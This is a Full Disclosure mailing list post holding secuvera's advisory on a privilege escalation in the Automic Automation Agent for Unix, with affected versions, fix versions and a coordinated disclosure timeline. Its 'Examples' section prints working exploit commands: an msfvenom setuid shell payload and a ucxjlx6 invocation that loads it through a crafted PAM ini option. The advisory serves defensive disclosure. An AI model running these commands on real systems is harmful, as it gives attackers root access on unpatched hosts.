Full Disclosure mailing list archives

secuvera-SA-2025-01: Privilege Escalation

Affected Products
   Automic Automation Agent Unix <24.3.0 HF4, <21.0.13 HF1

References
   secuvera-SA-2025-01
   CVE not assigned yet
   CWE-426: Untrusted Search Path
   CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

Summary:
   An agent configured to run in privileged mode using the SetUID-Bit can be used to escalate privileges, by supplying 
an ini file with the "authentication" option set to "PAM" and the "libName" option set to a shared object file 
controlled by the attacker.
   The shared object will be loaded in an elevated context and can be used to execute arbitrary code as root.

Effect:
   The vulnerability results in privilege escalation, caused by arbitrary code execution in the context of the 
vulnerable application.

Examples:
   1. Generate shared object file using msfvenom
   $ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so

   2. Run the ucxjlx6 executable as follows
   $ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = 
PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")


Solution:
   Update to version 24.3.0 HF4, 21.0.13 HF1 or higher

Disclosure Timeline:
   2025/01/20 vulnerability discovered
   2025/01/21 vendor contacted
   2025/01/21 vendor acknowledged receipt
   2025/02/04 requested status update
   2025/02/04 provided clarification about the issue
   2025/02/11 requested status update
   2025/02/26 vendor confirmed vulnerability
   2025/03/06 requested status update
   2025/03/17 vendor provided fix and requested review
   2025/04/03 vendor retracted request for review
   2025/04/10 proposed date for public disclosure, vendor requested delay
   2025/04/16 coordinated on cvss score and recommended fix
   2025/04/28 requested status update
   2025/05/02 vendor supplied tentative date for public disclosure
   2025/05/08 requested status update
   2025/05/12 public disclosure

Credits:
Flora Schaefer
fschaefer () secuvera de
secuvera GmbH
https://www.secuvera.de

Disclaimer:
    All information is provided without warranty. The intent is to
    provide information to secure infrastructure and/or systems, not
    to be able to attack or damage. Therefore secuvera shall
    not be liable for any direct or indirect damages that might be
    caused by using this information.

Mit freundlichen Grüßen

Flo Schäfer

Meine Pronomen sind sie*er/ihr*ihm. Ich freue mich über eine genderneutrale Anrede.

+49 7032/9758-29
--
#Neues von secuvera.de
- Vortrag auf der CSK-Summit 2025: https://www.secuvera.de/aktuelles/vortrag-auf-der-csk-summit-2025/
- 1.Platz bei GPTW: Bester Arbeitgeber in BW 2025: 
https://www.secuvera.de/aktuelles/1-platz-bei-gptw-bester-arbeitgeber-in-bw-2025/
- Jahresmeeting 2025 #insideVera: https://www.secuvera.de/aktuelles/jahresmeeting-2025-insidevera/


#Bleiben Sie informiert auf LinkedIn
https://www.linkedin.com/company/secuvera-gmbh
#Rechtliche Informationen
secuvera GmbH
Siedlerstraße 22-24
71126 Gäufelden/Stuttgart
www.secuvera.de

Registergericht: Amtsgericht Stuttgart HRB 241704
Geschäftsführer: Tobias Glemser, Reto Lorenz

Attachment: smime.p7s
Description:

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• secuvera-SA-2025-01: Privilege Escalation in Automic Automation Agent Unix Flo Schäfer via Fulldisclosure (May 16)